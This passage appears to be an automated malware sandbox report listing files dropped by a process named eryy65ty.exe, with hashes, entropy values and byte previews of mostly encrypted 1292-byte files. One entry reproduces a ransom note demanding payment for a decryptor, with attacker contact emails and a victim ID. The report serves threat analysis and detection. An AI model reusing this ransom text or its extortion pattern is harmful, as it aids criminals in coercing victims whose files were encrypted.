                                                                                                                                              Preview:\.P.#......]....K.x.M...8.O.!..d...UG.....k9.YP&...vG.m..]...T=....LV.O,.B...\w..o..E..r...fX3B.U..S............ji.\..I;..pEz..."....U.$:...Y.N..r......&5^.J.~:.~.n........Z>*,..Y......}?.3BL...d..5..\...s<..LR{..&..n....!.R..'.~Q3...\.....a...o.,.8...Hl..).>..Z.!...09.N*F....T...tz.=.R.M.+..h D..zV...#.0;.t...E.>.V.i.E..c. ..5.\....0c...}-......U.g.....P....&T.j.6G..T`.e..l..{A.D...H..*=.....1c.>z.6y.p.{....h.z.0Z.^..`yOT.+/...........?...#.:~...*[.(..'..;..U..o..7C3......}.&.5....d...=.n-S......|...`.......h.A..9..s!..P.~W@]......S.@4.dD.....8d......!.4&|.&$....U.>.K1.T.'.A......d.M.).....L.X...\...~q..'..E..*a...y.).j.J.~..p..1B(..........(...2}].HWM5olL.f0.a.....0XN.4..-.*.:._...y@.H<{.m\.L............b.3_./i.-.....Z.ON.1.....s.v..&Mv...S3S.wM.Z.=..-.@..C%...z.o. ........z$.l}..T...e(.~...?w..&.t3.n.V.K7....D2.h.g.,..A~.......^u..8`........v..........m..?m.....Q..Cd..P.&...eu/.E..=.....S....V.D.........?....H.3]m.x?....T.w.=..Q../.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.841421671379847
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2bYCBymnUJa2PyGjLvdHuEwei9fVV/lW9uKfKgVqP4TT8T9Sp2qR/Khvo1OBAs:2bn/UJmAvdOreKz/YuKfAP4TAT9ScqR0
                                                                                                                                              MD5:9D78DC67F1493370B51CAD447F74B893
                                                                                                                                              SHA1:E6D36EDB8C5796BDC34A682235407ACC702002BF
                                                                                                                                              SHA-256:76230CEB1EFD089A207C986676628F028DB35B0EEB9E541123042E86D729851F
                                                                                                                                              SHA-512:EA1079F9FC9BAFE194E4F12786287A52FA4CC0A23112DD4236A4923BCC335D9E6FC8ECB90BA00AD5E8AB5F6A87D8AB8534D428D2038CCAB57E2E060299AB55FB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..i&h.w......,H..j$%iQ..l..?K.u:N.~....x}<...A....0QP".]l..n.w.px"1...y{...k.k...s...h.J.E.l.}e..m.R.I........#Z`4.I."R.c..7......*.Qd.r...jT......[.E0..V..P..}...t.cL6....x.~./.Z....~F...X7G.....z...p...Q...3.Ku..j...B.v!7....B..aIU8"f........a.....c(......v...g.Ik.i.......%.:..j.,.+..,..KA...T..'...b..}WJ....._..k...\.R.H....k...q4.m.....T.I.._*.z.....G!8x;.O>s.{g....).JI.(hXL'....RS...G...m$Q..m.)3.t....g<.N.D.......[.d.}.l.....42.?....^..b.9.$...[.we. d..$.......`..(........a..)Ki,...L..-w.(.y.=4..ylFJ.).02IN.K.4....q.H.kH...}.8....YEe...] .$...Sh;.$.....dyC`.v;b>.K..*...FR".....N....#...*Vf...8..6m-Ld...V.*.^.....[G1....d....XS.N"..`v.r.=o...p.hFR.....M&o.....\g...... .!.#..;....T...R......R..eZ..n..QTu....gh."....u.=_n.=.f.f..h.k.w.........0....F@.").`.v..pG.5a%......2Q..rd.ZX..o*J.$......Z.......P9.a.u.c$.jDTd...f.@.!d...T.....)......7..h.-CH.Q....w|....a.+........&@g..c ..&._...Pb..&.1...4D"......!................H.xW...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.841421671379847
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2bYCBymnUJa2PyGjLvdHuEwei9fVV/lW9uKfKgVqP4TT8T9Sp2qR/Khvo1OBAs:2bn/UJmAvdOreKz/YuKfAP4TAT9ScqR0
                                                                                                                                              MD5:9D78DC67F1493370B51CAD447F74B893
                                                                                                                                              SHA1:E6D36EDB8C5796BDC34A682235407ACC702002BF
                                                                                                                                              SHA-256:76230CEB1EFD089A207C986676628F028DB35B0EEB9E541123042E86D729851F
                                                                                                                                              SHA-512:EA1079F9FC9BAFE194E4F12786287A52FA4CC0A23112DD4236A4923BCC335D9E6FC8ECB90BA00AD5E8AB5F6A87D8AB8534D428D2038CCAB57E2E060299AB55FB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..i&h.w......,H..j$%iQ..l..?K.u:N.~....x}<...A....0QP".]l..n.w.px"1...y{...k.k...s...h.J.E.l.}e..m.R.I........#Z`4.I."R.c..7......*.Qd.r...jT......[.E0..V..P..}...t.cL6....x.~./.Z....~F...X7G.....z...p...Q...3.Ku..j...B.v!7....B..aIU8"f........a.....c(......v...g.Ik.i.......%.:..j.,.+..,..KA...T..'...b..}WJ....._..k...\.R.H....k...q4.m.....T.I.._*.z.....G!8x;.O>s.{g....).JI.(hXL'....RS...G...m$Q..m.)3.t....g<.N.D.......[.d.}.l.....42.?....^..b.9.$...[.we. d..$.......`..(........a..)Ki,...L..-w.(.y.=4..ylFJ.).02IN.K.4....q.H.kH...}.8....YEe...] .$...Sh;.$.....dyC`.v;b>.K..*...FR".....N....#...*Vf...8..6m-Ld...V.*.^.....[G1....d....XS.N"..`v.r.=o...p.hFR.....M&o.....\g...... .!.#..;....T...R......R..eZ..n..QTu....gh."....u.=_n.=.f.f..h.k.w.........0....F@.").`.v..pG.5a%......2Q..rd.ZX..o*J.$......Z.......P9.a.u.c$.jDTd...f.@.!d...T.....)......7..h.-CH.Q....w|....a.+........&@g..c ..&._...Pb..&.1...4D"......!................H.xW...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.886543826627135
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:OmBpXo/5GmXZBsmr3yYyeigPNs9GJFLwU+b/AZ6Mpi6g:OmPylR7yVeiavFLw7Mp3g
                                                                                                                                              MD5:6B221A4487CE02547A0E8B78AD0DE6F5
                                                                                                                                              SHA1:C3BE0E379E7317E9E7B86B13879E6BD6F9EA12CA
                                                                                                                                              SHA-256:C0179E573AFBC5623404B40BD8E1E1AA75632DBF7EC779EE916A272449292A4A
                                                                                                                                              SHA-512:3D3743C0560BD466D3C137AA8EB4F56D4942D8E3A25E86A952EA44C2158CFEC046FA9E1000BB4922844BD6A83D3F13A8B0AF276BC22DB5F14E3CC95FAD5DD6D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..&.c...1......5D..S`B...(..8.t...^..2r.2.v..y.k.S<....8a..\D..K.z\ .....?...f..(af.....3..$....w,....X...N...h.z..).W..w/..?A...lV.........f4...l_..t.y+T....r.^R.4.wB.PG...@....s..b..l..PvW..U0.1..z@.5......<i>x.b...9.`...6E.mNW.....e.-..f...BN\O...H......u.....F...=6..#_.!..&%.0.-./.[. ..p.F\w.....CK3.x.[.a.F.5.r...T.rl.>.yj.....2..$..g.5.6.....&..t.<K.H.'.2...........R0.gE...`[.Q.(......HRe..I.R3U.g.*V.}.'....&.L...r5....#..v....(...zD. .O%...=.u.and:.+...Up...{.`..]4!k.......:*.t....k...........T..}.1..3.{'.0.b..p..x.O...d..4..5...)Kxa..*?....Z...P/.......'.?*...j..%..(....hy.....!.-..E...q..C.H'K..d..I.z..+x.j'...^zz8.`u_...u0p..Sd?..^...9.@X.2.{.6..^.k..??......^.b..7j...:.....?..)D.c...3._hH...K.|..h?d.S..t....X.'.$.H.J..../W.v..=;...^d..$uX........wR..H..$k..FS.wH..@..*.qr4.....I...g.=G...j.RUr..... ..RC|.%&..sv.~..X..1....6..]"e.:.n....2_xg_..X.S..J....P.YV..<?2....hJ.{..7V..X.&......Y..8....W\...}.X..oU.8...o..N.H..v...m.7...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.886543826627135
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:OmBpXo/5GmXZBsmr3yYyeigPNs9GJFLwU+b/AZ6Mpi6g:OmPylR7yVeiavFLw7Mp3g
                                                                                                                                              MD5:6B221A4487CE02547A0E8B78AD0DE6F5
                                                                                                                                              SHA1:C3BE0E379E7317E9E7B86B13879E6BD6F9EA12CA
                                                                                                                                              SHA-256:C0179E573AFBC5623404B40BD8E1E1AA75632DBF7EC779EE916A272449292A4A
                                                                                                                                              SHA-512:3D3743C0560BD466D3C137AA8EB4F56D4942D8E3A25E86A952EA44C2158CFEC046FA9E1000BB4922844BD6A83D3F13A8B0AF276BC22DB5F14E3CC95FAD5DD6D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..&.c...1......5D..S`B...(..8.t...^..2r.2.v..y.k.S<....8a..\D..K.z\ .....?...f..(af.....3..$....w,....X...N...h.z..).W..w/..?A...lV.........f4...l_..t.y+T....r.^R.4.wB.PG...@....s..b..l..PvW..U0.1..z@.5......<i>x.b...9.`...6E.mNW.....e.-..f...BN\O...H......u.....F...=6..#_.!..&%.0.-./.[. ..p.F\w.....CK3.x.[.a.F.5.r...T.rl.>.yj.....2..$..g.5.6.....&..t.<K.H.'.2...........R0.gE...`[.Q.(......HRe..I.R3U.g.*V.}.'....&.L...r5....#..v....(...zD. .O%...=.u.and:.+...Up...{.`..]4!k.......:*.t....k...........T..}.1..3.{'.0.b..p..x.O...d..4..5...)Kxa..*?....Z...P/.......'.?*...j..%..(....hy.....!.-..E...q..C.H'K..d..I.z..+x.j'...^zz8.`u_...u0p..Sd?..^...9.@X.2.{.6..^.k..??......^.b..7j...:.....?..)D.c...3._hH...K.|..h?d.S..t....X.'.$.H.J..../W.v..=;...^d..$uX........wR..H..$k..FS.wH..@..*.qr4.....I...g.=G...j.RUr..... ..RC|.%&..sv.~..X..1....6..]"e.:.n....2_xg_..X.S..J....P.YV..<?2....hJ.{..7V..X.&......Y..8....W\...}.X..oU.8...o..N.H..v...m.7...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.857277394434929
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:FY7i7OXwuLu7oUkv/BlKBL5/Iy2yx0ndxuyVURbJI9QHQ+FhdU5Teys9Gx:YMua7otv/vuN/IyfgdxuGKHQ+FhdzUx
                                                                                                                                              MD5:AFA9964FABF4FD344E1BCDC7B1BDD832
                                                                                                                                              SHA1:FFFA7898C6442EA150AB1238A00971796E322468
                                                                                                                                              SHA-256:32A5102359DDF9551BC38A24B263AC12AD907D2A1265545F47187983019CAB82
                                                                                                                                              SHA-512:8F6E1B94F16FBC16D3ED6F49FD99F73189079987D7F1557EBB2274336EA9CB04BDEAFEC0135FA39150A2EEB648406EEA7B6E761EC7174DD733C12F4BB0B6F7E0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..(....J_..W...V...]}x..I..O.Z.C.....#....GDZ........_m.O;.z.!..n.(.....5.....F.9s-?.E.l......]....J`..A...j..t.FV.D=.0%.l ...d...Y..(.Q&.,/.v.Y...........gt...,9..8;vp:g...[........hD..>.G.+}...L..,......#..*wY.P$. .i.zV......*.D.d...4^)c.sRy......\gI..g..]...q..........%..P.K.[.m.yB0..tp j.......`d...Y..k.....TLd.0>.b.!.V.../..M...fk..+...,...oe....`)..).8....8X..ZQ....t.h...*.x7...v.6T.L.......'B.It[..I}.#.4..M....ms..%....b>.4...J.33.....yN..:..VQ+.b.,.j..m].U.)P..l...o...;...C**..U.R0..9.%.......X..CNXf...;..D[t...01....gu.jP. .O..g.......r...64.,....)..]}.|.`..V.....%VN_.g.m3.ow.?..\,.e...`......3*\q...E..|.0.V...."......`.&D...O.lDc.I-...|.s...t{/F.........o.Np........e...rN..`...h.....%.Cl.B.7%+..M.a...A;....U..]l.f.a..!...\0.s.P.....R.+.....P.v.K.J.d..$....T.O7...{.c..6.~FU.@C`...8qGY.Kh..-i..!...r.N..0...UX9.....x>V!n..r..9o..<"}WFZ}..[....O.Sk.A]....(.<.......jL.;...........M8D....".d..W.h...eN.W. o..o..[....8.x..r.....E.n...(x.%.]
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.857277394434929
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:FY7i7OXwuLu7oUkv/BlKBL5/Iy2yx0ndxuyVURbJI9QHQ+FhdU5Teys9Gx:YMua7otv/vuN/IyfgdxuGKHQ+FhdzUx
                                                                                                                                              MD5:AFA9964FABF4FD344E1BCDC7B1BDD832
                                                                                                                                              SHA1:FFFA7898C6442EA150AB1238A00971796E322468
                                                                                                                                              SHA-256:32A5102359DDF9551BC38A24B263AC12AD907D2A1265545F47187983019CAB82
                                                                                                                                              SHA-512:8F6E1B94F16FBC16D3ED6F49FD99F73189079987D7F1557EBB2274336EA9CB04BDEAFEC0135FA39150A2EEB648406EEA7B6E761EC7174DD733C12F4BB0B6F7E0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..(....J_..W...V...]}x..I..O.Z.C.....#....GDZ........_m.O;.z.!..n.(.....5.....F.9s-?.E.l......]....J`..A...j..t.FV.D=.0%.l ...d...Y..(.Q&.,/.v.Y...........gt...,9..8;vp:g...[........hD..>.G.+}...L..,......#..*wY.P$. .i.zV......*.D.d...4^)c.sRy......\gI..g..]...q..........%..P.K.[.m.yB0..tp j.......`d...Y..k.....TLd.0>.b.!.V.../..M...fk..+...,...oe....`)..).8....8X..ZQ....t.h...*.x7...v.6T.L.......'B.It[..I}.#.4..M....ms..%....b>.4...J.33.....yN..:..VQ+.b.,.j..m].U.)P..l...o...;...C**..U.R0..9.%.......X..CNXf...;..D[t...01....gu.jP. .O..g.......r...64.,....)..]}.|.`..V.....%VN_.g.m3.ow.?..\,.e...`......3*\q...E..|.0.V...."......`.&D...O.lDc.I-...|.s...t{/F.........o.Np........e...rN..`...h.....%.Cl.B.7%+..M.a...A;....U..]l.f.a..!...\0.s.P.....R.+.....P.v.K.J.d..$....T.O7...{.c..6.~FU.@C`...8qGY.Kh..-i..!...r.N..0...UX9.....x>V!n..r..9o..<"}WFZ}..[....O.Sk.A]....(.<.......jL.;...........M8D....".d..W.h...eN.W. o..o..[....8.x..r.....E.n...(x.%.]
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.861155020339851
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:yaT9TPtvBSilHwtLtmM/S+iMZOoHYTacyVPMFgmLuepV2:yaTtpo16+iMZOo0a1VUOPepV2
                                                                                                                                              MD5:2B6F25DB9BA9835B4A67EB4A85372D13
                                                                                                                                              SHA1:E3E5A541D4BD2236F30C3692A005221FBB42B485
                                                                                                                                              SHA-256:EF3412D03EC9A8B7D77A2360F25FFD9A938058EC407F976415832B6CCDC6D1D8
                                                                                                                                              SHA-512:CCCD62B45C9105FC604A840D87A502777DC5CE72222E872F8192973580778144DD772C5EA387C1D813A44A5AC8712F05BCEF5F73573CBAA91DD9473A22AC6719
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:-q..-.p....RD..UO.XM..c...".....Af2..S..Z.s...~z.'....ZO...a.@:.1....i1.ZG.]...#......\ko.m....e...Q. ..u...l..D.J.N}#2mI..\...d0...&3.....~...<d.|.....X...v'vl..%k.g...)yZ....L...9v[v...."FTe..M......-.)s.A.....}#....7.Z..y....#..".........0..skd.]p..@..7ri.:=.=R....:(...h.x......J....3.7.8..U.....p.....:.Hj.o.......#.....5.."W.........E1...~....}..g. ..X..DTUEt...>xBv..1.#.......J...k...A..=.....C+_.$JF.v....*.{E.L......W.T.....D.]{.|.....=..yK.(/.1.>y..!.C.s....YV`'0.....e....T..7.+........}......:qV[....o....4.=.G.q.F.\.m......)...-..<..G'.X.0]..Kg..c.....=.rlw/......rf9.X.....!D.|5....v...`...b.j..d..[7,.!.........g..>O.p..Y..W...]b%.......=.......6..r.Q.t.mq0w.Hv~3*....`c~.qjz".$G.[...*.J!..~u.F.."..t~.....x.Q.>.'d.O.5.z.)G....A.)...fG....S-ex.^W<S....r]W.Ee.K.S..+>...;.x...G.CPn..p..9.P.f..p....=>....\y...Q....+QV.Z."m....&..........A........:x...G..Qn.=...F....^...9,U).Q...m..6..W...h-.LGr.065...V=i..pV...[e.'f.[....Gfj
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.861155020339851
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:yaT9TPtvBSilHwtLtmM/S+iMZOoHYTacyVPMFgmLuepV2:yaTtpo16+iMZOo0a1VUOPepV2
                                                                                                                                              MD5:2B6F25DB9BA9835B4A67EB4A85372D13
                                                                                                                                              SHA1:E3E5A541D4BD2236F30C3692A005221FBB42B485
                                                                                                                                              SHA-256:EF3412D03EC9A8B7D77A2360F25FFD9A938058EC407F976415832B6CCDC6D1D8
                                                                                                                                              SHA-512:CCCD62B45C9105FC604A840D87A502777DC5CE72222E872F8192973580778144DD772C5EA387C1D813A44A5AC8712F05BCEF5F73573CBAA91DD9473A22AC6719
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:-q..-.p....RD..UO.XM..c...".....Af2..S..Z.s...~z.'....ZO...a.@:.1....i1.ZG.]...#......\ko.m....e...Q. ..u...l..D.J.N}#2mI..\...d0...&3.....~...<d.|.....X...v'vl..%k.g...)yZ....L...9v[v...."FTe..M......-.)s.A.....}#....7.Z..y....#..".........0..skd.]p..@..7ri.:=.=R....:(...h.x......J....3.7.8..U.....p.....:.Hj.o.......#.....5.."W.........E1...~....}..g. ..X..DTUEt...>xBv..1.#.......J...k...A..=.....C+_.$JF.v....*.{E.L......W.T.....D.]{.|.....=..yK.(/.1.>y..!.C.s....YV`'0.....e....T..7.+........}......:qV[....o....4.=.G.q.F.\.m......)...-..<..G'.X.0]..Kg..c.....=.rlw/......rf9.X.....!D.|5....v...`...b.j..d..[7,.!.........g..>O.p..Y..W...]b%.......=.......6..r.Q.t.mq0w.Hv~3*....`c~.qjz".$G.[...*.J!..~u.F.."..t~.....x.Q.>.'d.O.5.z.)G....A.)...fG....S-ex.^W<S....r]W.Ee.K.S..+>...;.x...G.CPn..p..9.P.f..p....=>....\y...Q....+QV.Z."m....&..........A........:x...G..Qn.=...F....^...9,U).Q...m..6..W...h-.LGr.065...V=i..pV...[e.'f.[....Gfj
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.838629851682887
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:HbROwi2WhOMgaOj+9akdqTrSaPcttKLc5hWaTrKYrgHrDEvkMONP5SC3pZ:tO9BhOp0jWe4ID5YAkMhC3pZ
                                                                                                                                              MD5:45418D48A081A67344E28DF3DCC4F228
                                                                                                                                              SHA1:929BBB09EDC47592FD0E248FEA40A15A97B7BA6C
                                                                                                                                              SHA-256:61D39C661E1EDDF76B85DAFEE5CC4BDFBB9D60770EEE7B425E3076F1F1D4EBA7
                                                                                                                                              SHA-512:CC9E131B6B6D39328FDADA2CFFDD886E02DCA24239624BADC63F8E48C83AA38DB266768603FE43A9AE3C98210C3AA8F128F652B57104AC80D4264A76A3878780
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.)L.T.....D~4..7.j.../...A..t....4.Z........S...xWv .......z1V.... %..._.*u...(.zU.o3.N.#c...*..[...-.....K..T.eBg.......!.....k....`.r.|Y.n..{dO..7.p.h......U.,.#(..=\h.8.....o.V.M..2.M4:G-y/.,.[......xb.|..W.........d..h....$!...).h]u..\lQ.!5..8.S..).u.:#...h..y.....i.v....s.U.w.7...k.)E|...j.F...k.J.\Y....(....`.:D.....+.y..@... ...5...s......s..|...F)o&..|.%ljU7.D...<+.7..q...==.]k.?d....[...!.3.j...+...g..\3...Dq|n.;..z..u..'..e.%......,,.....=J......}..E..(.\..'.I..s.....>Qb5..8.j|.p.Ds.7..o.\e.`.t...G..|p..3.p....M....~l.P....q{..h.......%......../...^.P9.~....x-..mzW..o....9.(....r.e..FZ.1.V...OIX.B{..z.....gb'j......-......6.....g..r.@.._r...).]b.Q.Z_8..n.......%.O....bA..B6g.[...6B...............o.q,...o.t..*WDajZ7b?WP.{k..7..6.=H*......V*.1?l$.[......HW.wU.V..(.p...<b..........e.c.].Z.*.Zq..........A..]O_.V)...I..~:2.UJW...*..*...M...u...S..P..k.T._.Q....H{.....B......6..7.\.b.5....Q..<P0.....m{..v...p....l.w.+}|......;0.>m...w.f
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.838629851682887
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:HbROwi2WhOMgaOj+9akdqTrSaPcttKLc5hWaTrKYrgHrDEvkMONP5SC3pZ:tO9BhOp0jWe4ID5YAkMhC3pZ
                                                                                                                                              MD5:45418D48A081A67344E28DF3DCC4F228
                                                                                                                                              SHA1:929BBB09EDC47592FD0E248FEA40A15A97B7BA6C
                                                                                                                                              SHA-256:61D39C661E1EDDF76B85DAFEE5CC4BDFBB9D60770EEE7B425E3076F1F1D4EBA7
                                                                                                                                              SHA-512:CC9E131B6B6D39328FDADA2CFFDD886E02DCA24239624BADC63F8E48C83AA38DB266768603FE43A9AE3C98210C3AA8F128F652B57104AC80D4264A76A3878780
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.)L.T.....D~4..7.j.../...A..t....4.Z........S...xWv .......z1V.... %..._.*u...(.zU.o3.N.#c...*..[...-.....K..T.eBg.......!.....k....`.r.|Y.n..{dO..7.p.h......U.,.#(..=\h.8.....o.V.M..2.M4:G-y/.,.[......xb.|..W.........d..h....$!...).h]u..\lQ.!5..8.S..).u.:#...h..y.....i.v....s.U.w.7...k.)E|...j.F...k.J.\Y....(....`.:D.....+.y..@... ...5...s......s..|...F)o&..|.%ljU7.D...<+.7..q...==.]k.?d....[...!.3.j...+...g..\3...Dq|n.;..z..u..'..e.%......,,.....=J......}..E..(.\..'.I..s.....>Qb5..8.j|.p.Ds.7..o.\e.`.t...G..|p..3.p....M....~l.P....q{..h.......%......../...^.P9.~....x-..mzW..o....9.(....r.e..FZ.1.V...OIX.B{..z.....gb'j......-......6.....g..r.@.._r...).]b.Q.Z_8..n.......%.O....bA..B6g.[...6B...............o.q,...o.t..*WDajZ7b?WP.{k..7..6.=H*......V*.1?l$.[......HW.wU.V..(.p...<b..........e.c.].Z.*.Zq..........A..]O_.V)...I..~:2.UJW...*..*...M...u...S..P..k.T._.Q....H{.....B......6..7.\.b.5....Q..<P0.....m{..v...p....l.w.+}|......;0.>m...w.f
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.873611596952334
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:i17pnHCcygswWA61TpAVpAn6E+jfl6a0QFreAAF391qknMoz/QX9Y7aBUfZ:i1Jygswj61TpmunTk6/Gre1NJnnEOWUh
                                                                                                                                              MD5:AA53F247397DF8BD869002B7A7135210
                                                                                                                                              SHA1:D21F5CB2AA4A63C6787A6E259037FDB92114DFA4
                                                                                                                                              SHA-256:2BC6286A3277569CE30B71AE576C745E8C562853EAE6884CC73C852F7A41A559
                                                                                                                                              SHA-512:5212C7232B890237BA7929E0066A490BD9E214FEEF87DA7543878804896DB6A9FD300AEAECBD4925DCDC44E9541D1957D5EE04C6979DA69707F19582E7D297F3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.`.r9U..WD...Rj[..}B.c.........:`.N.....A!.........~.....RI'..."................ @..~5...F"i`.n.H......&...]..b....,....9.....0....l-z<'.,..:.N.<.A....*...#pz{.#.,.k.w.>V.F...;VT^p....X..s..@.#....../z.%{...w.@.Us.B=&.l.y!d5rdL.........1........0.Q......m.4.........x(....;..5..Z...#;.....G*..%B..g.a..E./0...a.H.9.'......w#:.....M..^^9.w.:~..b."....y"J..G..{mt.d7b......j.U..Hf.n1,f.....Y...#...w..x.mG.Ww.e....r.>A@....~..#..g.rQ..}..........j.P.L.wO8...B+.....D.Y.8hZ..A.'.f..'D.hVh.+{..u......t..k.U.....b....d..o.SN.......y...r.w.Z.........u.A.0M..&..G2`.,.::\.}......&..p..<.V.d.......Enf..)o.........v..`.x.C.qh7..K.G.].q ...er|H3K.m#nTi.E!J..6.k........nX.........3.M..W8[.G.y.r....\...l$..4a.J..>......I....\3...{.O.r*VG]..Y.Bf.Q..(I.Y..0Pqb.ig.c.2 U.Y...Lx..n|....1]....!..}.I.......L...|....y..2/.d.|(n..Z.#fv..s.=.0....1..........<a........M.F......w.....3.)..h...JG9..;......I.'....E..e..j....i.l.'...C..".4@#.>./.Tf.'...;f.d`w"...Y
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.873611596952334
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:i17pnHCcygswWA61TpAVpAn6E+jfl6a0QFreAAF391qknMoz/QX9Y7aBUfZ:i1Jygswj61TpmunTk6/Gre1NJnnEOWUh
                                                                                                                                              MD5:AA53F247397DF8BD869002B7A7135210
                                                                                                                                              SHA1:D21F5CB2AA4A63C6787A6E259037FDB92114DFA4
                                                                                                                                              SHA-256:2BC6286A3277569CE30B71AE576C745E8C562853EAE6884CC73C852F7A41A559
                                                                                                                                              SHA-512:5212C7232B890237BA7929E0066A490BD9E214FEEF87DA7543878804896DB6A9FD300AEAECBD4925DCDC44E9541D1957D5EE04C6979DA69707F19582E7D297F3
                                                                                                                                              Malicious:false
